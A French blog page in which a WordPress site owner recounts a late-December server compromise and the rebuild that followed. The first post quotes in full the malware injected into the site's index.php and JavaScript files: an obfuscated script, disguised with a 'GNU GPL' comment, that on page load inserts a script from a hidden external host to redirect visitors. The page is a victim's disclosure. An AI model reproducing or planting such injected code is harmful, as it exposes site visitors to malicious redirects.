Article tagué fail

GNU GPL malware : Troj/JSRedir-AK

J’ai du réinstaller complètement ce site par 2 fois dans la nuit du 22 au 23 et dans la nuit du 23 au 24 décembre à cause d’un malware qui s’amuse à se faire passer pour un javascript légitime mais qui en fait redirige le browser vers des sites malicieux.

En fait tous les fichiers index.php et *.js se retrouvent en quelques minutes avec ce bout de code à la fin du source :

<script>/*GNU GPL*/ try{window.onload = function (){var Qslzfsla93tulo = document.createElement(’ s#&&c$r)&i!&&p)t$@#’.replace(/\!|@|&|\$|\)|\(|#| \^/ig, ”));Qslzfsla93tulo.setAttribute(’type’, ‘ text/javascript’);Qslzfsla93tulo.setAttribute(’s rc’, ‘h$!t#^t$@$p):)#/!!/)e!!n$e@^^t$-#(!(c$(^#o !!m!&^-&c#((n##!^.^e)#b!a!y&^$.)$@f&$r!.^e)&l#)m &!@u(@n(#$d^o!-#e)!s@&&$.!!&v@&)i#)e##@w)&$(^h&# o!$^m!e&s)&a@(#(l(#)emce_markeramp;$@.^(#r#$u$(!:&&^$8()0&(8 $0$^/)^m^#e(#(!.^c(@(o(@&#)m@&(/@m()e^#&.(@##c&) $#o#(m#/@!^$g((o^o#@$g@(^l^#&@e&((.)#c#!^o)(m&!/ ))!(s#^e$@#(n&d&)s@p&@a&^c)!)#e^#!$.$#c((o(!)m^^ !/^#c())l)(o#@@o!b).!c@o&m$/(^)&’.replace(/\^|&| @|\!|\$|\)|\(|#/ig, ”));Qslzfsla93tulo.setAttrib ute(’defer’, ‘defer’);Qslzfsla93tulo.setAttribut e(’id’, ‘I)(r#^w)@#@d&)^0@$#s$)v!(u&)s^@d^’.repl ace(/\!|&|\)|\$|\^|@|\(|#/ig, ”));document.body. appendChild(Qslzfsla93tulo);}} catch(e) {}</script>

Pour la deuxième attaque j’ai trouvé grâce à Piekes un bout de code qui sera peut-être mon sauveur. En tout cas maintenant je suis un peu moins seul et j’espère ne pas devoir refaire une installation.

[EDIT du 24/12 – 23HOO] Beaucoup plus d’info ici

[EDIT du 24/12 – 23H41] Encore mieux ici


cheval de Troie JS:Illredir-A [Trj], warnings et admin inaccessible

Cela fait un peu plus de 48H que je me bat à remettre sur pied ce blog suite à une attaque sur le serveur.

Le cheval de Troie a été supprimé, la version WordPress a été upgradée, l’admin est à nouveau disponible.

Par contre j’ai complètement perdu mon thème et mes plugins, je dois repartir from scratch. Donc pour l’instant je met un thème par défaut. Il doit aussi y avoir des liens morts, n’hésitez pas à me faire un retour en commentaire.

Je pense pouvoir résorber tout ça en une dixaine de jours, fêtes obligent. D’ailleurs bonnes fêtes aux lecteurs de passage.